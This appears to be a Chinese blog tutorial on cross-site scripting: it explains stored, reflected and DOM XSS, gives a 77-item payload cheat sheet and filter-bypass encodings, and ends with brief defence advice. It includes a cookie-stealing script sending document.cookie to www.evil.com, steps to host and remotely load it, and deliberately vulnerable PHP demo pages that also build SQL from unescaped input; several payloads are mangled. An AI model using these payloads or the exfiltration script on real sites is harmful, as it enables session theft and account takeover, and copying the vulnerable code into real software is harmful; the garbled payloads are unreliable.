xss漏洞有几种类型，网络安全之从原理看懂XSS

01、XSS的原理和分类

跨站脚本攻击XSS(Cross Site SCRIPTing)，为了不和层叠样式表(Cascading Style Sheets，CSS)的缩写混淆

故将跨站脚本攻击缩写为XSS，恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页面时，嵌入Web里面的Script代码会被执行，从而达到恶意攻击用户的目的，XSS攻击针对的是用户层面的攻击；

XSS分为：存储型，反射型，DOM型XSS

存储型XSS：存储型XSS，持久化，代码是存储在服务器中，如在个人信息或发表文章等地方，插入代码，如果没有过滤或者过滤不严，那么这些代码将储存到数据库中，用户访问该页面的时候出发代码执行，这种XSS比较危险，容易造成蠕虫，盗取Cookie；

反射型XSS：非持久化，需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容)，一般容易出现在搜索页面，反射性XSS大多数是用来盗取用户的Cookie信息；

DOM型XSS:不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Object Model ,DOM)的一种漏洞，DOM-XSS是用过url传入参数取控制触发的，其实也属于反射型XSS，DOM的详解：DOM文档对象模型；

【一一帮助安全学习，所有资源关注我，私信回复“资料”获取一一】

①网络安全学习路线

②20份渗透测试电子书

③安全攻防357页笔记

④50份安全攻防面试指南

⑤安全红队渗透工具包

⑥网络安全必备书籍

⑦100个漏洞实战案例

⑧安全大厂内部视频资源

⑨历年CTF夺旗赛题解析

可能触发DOM型XSS的属性

document.referer

window.name

location

innerHTML

documen.write

1、盗取各类用户账号，如机器登陆账号，用户网银账号，各类管理员账号；

2、控制企业数据，包括读取，篡改，添加，删除企业敏感数据的能力；

3、盗取企业重要的具有商业价值的资料；

4、非法转账；

5、强制发送电子邮件；

6、网站挂马；

7、控制受害者机器向其他网站发起攻击；

在网站是否存在XSS漏洞时，应该输入一些标签，如<，>输入后查看网页源代码是否过滤标签，如果没有过滤，很大可能存在XSS漏洞。

常用测试语句：

<h5>1</h5>

<span>1</span>

可以看到，网站并没有对标签进行过滤；

<script>console.log(1);</script>

可以看到，并没有弹出，但是控制台上输出了1，我们可以确定，确实存在XSS；

闭合问题：很多时候，在测试XSS的时候，想要要考虑到闭合问题，我们首先查看网页的源代码，需要首先判断出来，网站用的时单引号闭合还是双引号闭合；

"><span>x</span><"

'><span>x</span><'

单行注释：

"><span>x</span>//#双斜杠表示注释掉后面的语句

输入检测确定标签没有过滤，为了显示漏洞存在，需要插入XSS攻击代码；

<script>alert(1)</script><svg onload=alert(1)><a href=javascript:alert(1)><a href='javascript:alert(1)'>aa</a>

(1)普通的 XSS JavaScript 注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG 标签 XSS 使用 JavaScript 命令

<IMG SRC=http://3w.org/XSS/xss.js/>

(3)IMG 标签无分号无引号

<IMG SRC=javascript:alert('XSS')>

(4)IMG 标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5)html 编码(必须有分号)

<IMG SRC=javascript:alert("XSS")>

(6)修正缺陷 IMG 标签

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7)formCharCode 标签(计算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8 的 Unicode 编码(计算器)

<IMG SRC=jav..省略..S')>

(9)7 位的 UTF-8 的 Unicode 编码是没有分号的(计算器)

<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)

<IMG SRC=java..省略..XSS')>

(11)嵌入式标签,将 Javascript 分开

<IMG SRC="jav ascript:alert('XSS');">

(12)嵌入式编码标签,将 Javascript 分开

<IMG SRC="jav ascript:alert('XSS');">

(13)嵌入式换行符

<IMG SRC="jav ascript:alert('XSS');">

(14)嵌入式回车

<IMG SRC="jav ascript:alert('XSS');">

(15)嵌入式多行注入 JavaScript,这是 XSS 极端的例子

<IMG SRC="javascript:alert('XSS')">

(16)解决限制字符(要求同页面)

<script>z='document.'</script><script>z=z 'write("'</script><script>z=z '<script'</script><script>z=z 'src=ht'</script><script>z=z 'tp://ww'</script><script>z=z 'w.shell'</script><script>z=z '.net/1.'</script><script>z=z 'js></sc'</script><script>z=z 'ript>")'</script><script>eval_r(z)</script>

(17)空字符 12-7-1 T00LS - Powered by Discuz! Board

https://www.a.com/viewthread.php?action=printable&tid=15267 2/6perl-e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18)空字符 2,空字符在国内基本没效果.因为没有地方可以利用

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19)Spaces 和 META 前的 IMG 标签

<IMG SRC=" javascript:alert('XSS');">

(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~ -_.,:;?@[/|\]^`=alert("XSS")>

(22)Non-alpha-non-digit XSS to 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23)双开括号

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)

<SCRIPT SRChttp://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的 HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27)双开角括号

<Iframe src=http://3w.org/XSS.html <

(28)无单引号 双引号 分号

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

(29)换码过滤的 JavaScript

\";alert('XSS');//

(30)结束 Title 标签

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31)Input Image

<INPUT SRC="javascript:alert('XSS');">

(32)BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33)BODY 标签

<BODY('XSS')>

(34)IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

(35)IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

(36)BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37)STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38)远程样式表

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39)List-style-image(列表式)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE<UL><LI>XSS

(40)IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41)META 链接 url

<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://URL=javascript:alert('XSS');">

(42)IFRAME

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43)Frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>12-7-1 T00LS - Powered by Discuz!Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 3/6

(44)Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45)TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46)DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47)DIV background-image 后加上额外字符

(1-32&34&39&160&8192-8&13&12288&65279) **<DIV STYLE="background-image: url(javascript:alert('XSS'))">**

(48)DIV expression

<DIV STYLE="width: expression_r(alert('XSS'));">

(49)STYLE 属性分拆表达

<IMG STYLE="xss:expression_r(alert('XSS'))">

(50)匿名 STYLE(组成:开角号和一个字母开头)

<XSS STYLE="xss:expression_r(alert('XSS'))">

(51)STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><ACLASS=XSS></A>

(52)IMG STYLE 方式

exppression(alert("XSS"))'>

(53)STYLE background

<STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>(54)BASE<BASE HREF="javascript:alert('XSS');//">

(55)EMBED 标签,你可以嵌入 FLASH,其中包涵 XSS

<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56)在 flash 中使用 ActionScrpt 可以混进你 XSS 的代码

a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a b c d);

(57)XML namespace.HTC 文件必须和你的 XSS 载体在一台服务器上

<HTML xmlns:xss><?import namespace="xss"

implementation="http://3w.org/XSS/xss.htc"><xss:xss>XSS</xss:xss></HTML>

(58)如果过滤了你的 JS 你可以在图片里添加 JS 代码来利用

<SCRIPT SRC=""></SCRIPT>

(59)IMG 嵌入式命令,可执行任意命令

<IMG SRC="http://www.a.com/a.php?a=b">

(60)IMG 嵌入式命令(a.jpg 在同服务器)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤·

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)<SCRIPT a=> SRC="http://3w.org/xss.js"></SCRIPT>

(66)

12-7-1 T00LS - Powered by Discuz! Boardhttps://www.a.com/viewthread.php?action=printable&tid=15267 4/6<SCRIPT a=">'>"SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68)URL 绕行

<A HREF="http://127.0.0.1/">XSS</A>

(69)URL 编码

<A HREF="http://3w.org">XSS</A>

(70)IP 十进制

<A HREF="http://3232235521″>XSS</A>

(71)IP 十六进制

<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP 八进制

<A HREF="http://0300.0250.0000.0001″>XSS</A>

(73)混合编码

<A HREF="http://6 6.000146.0×7.147/"">XSS</A>

(74)节省[http:]

<A HREF="//www.google.com/">XSS</A>

(75)节省[www]

<A HREF="http://google.com/">XSS</A>

(76)绝对点绝对 DNS

<A HREF="http://www.google.com./">XSS</A>

(77)javascript 链接

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

各个标签的的攻击语句；

<script>alert("hack")</script> #弹出hack<script>alert(/hack/)</script> #弹出hack<script>alert(1)</script> #弹出1，对于数字可以不用引号<script>alert(document.cookie)</script> #弹出cookie<script src=http://xxx.com/xss.js></script> #引用外部的xss

svg标签：

<svg onload="alert(1)"><svg onload="alert(1)"//

标签：

<img src=1 οnerrοr=alert("hack")><img src=1 οnerrοr=alert(document.cookie)> #弹出cookie

标签：

<body οnlοad=alert(1)><body οnpageshοw=alert(1)>

video 标签：

<video οnlοadstart=alert(1) src="/media/hack-the-planet.mp4" />

style标签：

<style οnlοad=alert(1)></style>05、XSS漏洞的挖掘5.1、黑盒测试

尽可能找到一切用户可控并且能够输出在页面代码中的地方，比如下面这些：

• URL的每一个参数
• URL本身
• 表单
• 搜索框

• 重灾区：评论区，留言区，个人信息，订单信息等
• 针对型：站内信，网页及时通讯，私信，意见反馈
• 存在风险：搜索框，当前目录，图片属性等；

关于XSS的代码审计主要就是从接收参数的地方和一些关键此入手；

PHP中常见的接收参数的方法有_GET，GET，_POST，$_REQUEST等等，可以搜索所有接收参数的方法，然后对接收到的数据进行跟踪，看看有没有输出到页面中，然后看看输出到页面中的数据是否进行了过滤和html编码等处理

也可以搜索类似echo这样的输出语句，跟踪输出的变量是从哪里来的，我们是否能控制，如果从数据库中取得，是否能控制存到数据库得数据，存到数据库之前有没有得到过滤等等；

大多数程序会对接收参数封装在公共文件得函数中统一调用，我们就需要审计这些公共函数看有没有过滤，能否绕过等等；

同理审计DOM型注入可以搜索一些js操作DOM元素得关键字进行审计；

1、Alice经常浏览某个网站，此网站为Bob所拥有，Bob的站点需要Alice使用用户名、密码进行登陆，并存储了Ailce敏感信息(比如银行账户)；

2、Tom发现Bob的站点存在反射的XSS漏洞；

3、Tom利用Bob网站的反射型XSS漏洞编写了一个exp，做成链接的形式，并利用各种手段诱导Alice点击

4、Alice在登陆Bob的站点后，浏览了Tom提供的恶意链接；

5、嵌入到恶意链接中的恶意脚本在Alice的浏览器中执行，此脚本盗取敏感信息(cookie,账号等信息)，然后在Alice完全不知情的情况下将这些信息发送给了Tom；

6、Tom利用获取到的Cookie就可以以Alice的身份信息登陆Bob的站点，如果脚本的功能更强大的化，Tom还可以对Alice的浏览器做控制并进一步利用漏洞控制；

1、Bob拥有一个Web站点，该站点允许用户发布信息，浏览已发布的信息；

2、Tom检测到Bob的站点存在存储型的XSS漏洞；

3、Tom在Bob的网站发布了一个带有恶意脚本的热点信息，该热点信息存储在了Bob的服务器的数据库中，然后吸引其他用户来阅读该热点信息；

4、Bob或者时任何的其他人，如Alice浏览了该信息之后，Tom的恶意脚本就会执行；

5、Tom的恶意脚本执行后，Tom就可以对浏览器该页面的用户发起一次XSS攻击；

XSS漏洞能够通过构造恶意的XSS语句实现很多功能，其中做常用的时，构建XSS恶意代码获取对方浏览器的COOKIE；

1）我们首先把恶意代码保存在本地kali里面，实战情况下，我们将代码保存在我们的服务器上；

var img=document.createElement("img");img.src="http://www.evil.com/log?" escape(document.cookie);document.body.appendChild(img);

2）我们在kali，用python开启http服务；

python -m http.server 80

3）我们在有XSS漏洞的地方，远程加载我们的恶意代码：

<script src="http://192.168.61.128/xss.js"></script>

看到浏览器加载了，我们的xss恶意代码；

4）成功获取到了cookie信息

5）图片创建链接

<img src=''onerror=document.body.appendChild(document.createElement('script')).src='//192.168.0.110/xss.js'>

6）字符拼接

这种一般是输入的字符有限制的时候使用

<script>z='document.'</script><script>z=z 'write("'</script><script>z=z '<script'</script><script>z=z ' src=ht'</script><script>z=z 'tp://www.'</script><script>z=z 'xsstools'</script><script>z=z '.com/a'</script><script>z=z 'mER></sc'</script><script>z=z 'ript>")'</script><script>eval(z)</script>有的情况要用/**/注释不需要的代码。

7）jQuery加载

<script>$.getScript("//www.xsstools.com/amER");</script>7.2、反射型XSS：

//前端 1.html：<html><head lang="en"> <meta charset="UTF-8"> <title>反射型XSS</title></head><body> <form action="action.php" method="post"> <input type="text" name="name" /> <input type="submit" value="提交"> </form></body></html>//后端 action.php：<?php $name=$_POST["name"]; echo $name;?>

我们接着在输入框输入:<script>alert(/xss/)</script>

页面直接弹出了xss的页面，可以看到， 我们插入的语句已经被页面给执行了，这就是最基本的反射型XSS漏洞，这种漏洞流向：前端–>后端–>前端

//前端：2.html<html><head lang="en"> <meta charset="UTF-8"> <title>存储型XSS</title></head><body> <form action="action2.php" method="post"> 输入你的ID：<input type="text" name="id" /> <br/> 输入你的Name：<input type="text" name="name" /> <br/> <input type="submit" value="提交"> </form></body></html>//后端：action2.php<?php $id=$_POST["id"]; $name=$_POST["name"]; mysql_connect("localhost","root","root"); mysql_select_db("test"); $sql="insert into xss value ($id,'$name')"; $result=mysql_query($sql);?>//供其他用户访问页面：show2.php<?php mysql_connect("localhost","root","root"); mysql_select_db("test"); $sql="select * from xss where id=1"; $result=mysql_query($sql); while($row=mysql_fetch_array($result)){ echo $row['name']; }?>

这里有一个用户提交页面，数据提交给后端之后，后端存储在数据库中，然后当其他用户访问另一个页面的时候，后端调出该数据，显示给另一个用户，XSS代码就被执行了；

我们输入3和<script>alert(/xss/)</script>，接着，我们看看数据库；

可以看到，我们的XSS语句已经插入到数据库中了；

然后当其他用户访问，show2.php页面的时候，我们插入的XSS代码就执行了；

存储型XSS的数据流向是：前端–>后端–>数据库–>后端–>前端

先放源代码：

// 前端3.html<html> <head lang="en"> <meta charset="UTF-8"> <title>DOM型XSS</title> </head> <body> <form action="action3.php" method="post"> <input type="text" name="name" /> <input type="submit" value="提交"> </form> </body> </html> // 后端action3.php <?php $name=$_POST["name"];?><input id="text" type="text" value="<?php echo $name; ?>"/><div id="print"></div><script type="text/javascript"> var text=document.getElementById("text"); var print=document.getElementById("print"); print.innerHTML=text.value; // 获取 text的值，并且输出在print内。这里是导致xss的主要原因。</script>

这里有一个提交页面，用户可以在此提交数据，数据提交之后，给后台处理；

我们可以输入<img src=1 onerror=alert(‘hack’)>,然后看看页面的变化；

页面直接弹出了hack的页面，我们插入的语句已经被页面给执行了；

这就是DOM型XSS的漏洞，这种漏洞的数据流向是：前端–>浏览器

如果gpc开启的时候，特殊字符会被加上斜杠即，‘变成’，xss攻击代码不要用带单引号和双引号；

绕过gpc在php高版本gpc默认是没有的，但是开发程序员会使用addcslashes()对特殊字符进行转义；

<script src='http://www.xss123.com/JGdbsl?1623638390'></script>这个是执行不了的

<script src=http://www.xss123.com/JGdbsl?1623638390></script>没有单引号可执行

当页面过滤alert这个函数时，因为这个函数会弹窗，不仅很多程序会对他进行过滤，而且很多waf都会对其进行拦截，所以不存在alert即可；

<script>prompt(/xss/);</script><script>confirm(1);</script><script src=http://www.xss123.com/eciAKJ?1623635663></script>8.3、过滤标签

在程序里如果使用了html实体过滤，在php会使用htmlspecialchars()对输入的字符进行实体化，实体化之后的字符不会在html执行，把预定义的字符"<“(小于)和”>"(大于)转化为HTML实体，构造xss恶意代码大多数都必须使用<或者>，这两个字符被实体化之后，html里就不能执行了；

预定义的字符是：

&(和号)成为&

“(双引号)成为"

’(单引号)成为'

<(小于)成为<

·>(大于)成为>

但是又在input这些标签里是不用考虑标签实体化，因为用不上<>这两个标签，

<input type="text" name="username" value="" onclick="javascript:alert('xss');"/>

<script>alert(String.fromCharCode(88,83,83))</script>

<a href="javascript:alert(2)">123</a>

编码直通车：https://www.jb51.net/tools/zhuanhuan.htm

八进制编码：

<script>eval("\141\154\145\162\164\50\61\51");</script>

16进制编码

<script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script>

jsunicode编码

<script>\u0061\u006c\u0065\u0072\u0074('xss');</script>

在=后可以解析html编码

十进制：

<img src="x" onerror="alert(1)" />

<button onclick="confirm('7');">Button</button>

十六进制

'<img src="x" onerror="alert(1)"/>'8.8、base64编码

使用伪协议base64解码执行xss

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">111</a><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>0x09、XSS的防御

XSS防御的总体思路是：对用户的输入(和URL参数)进行过滤，对输出进行html编码，也就是对用户提交的所有内容进行过滤，对url中的参数进行过滤，过滤掉会导致脚本执行的相关内容，然后对动态输出到页面的内容进行html编码，使脚本无法在浏览器中执行；

对输入的内容进行过滤，可以分为黑名单和白名单过滤，黑名单过滤虽然可以拦截大部分的XSS攻击，但是还是存在被绕过的风险，白名单过滤虽然可以基本杜绝XSS攻击，但是真实环境中一般是不能进行如此严格的白名单过滤的；

对输出进行html编码，就是通过函数，将用户的输入的数据进行html编码，使其不能作为脚本运行；

如下是使用php中的htmlspecialchars函数对用户输入的name参数进行html编码，将其转化为html实体；

#使用htmlspecialchars函数对用户输入的name参数进行html编码，将其转换为html实体$name = htmlspecialchars( $_GET[ 'name' ] );

我们还可以服务端设置会话Cookie的HTTP Only属性，这样客户端的JS脚本就不能获取Cookie信息了；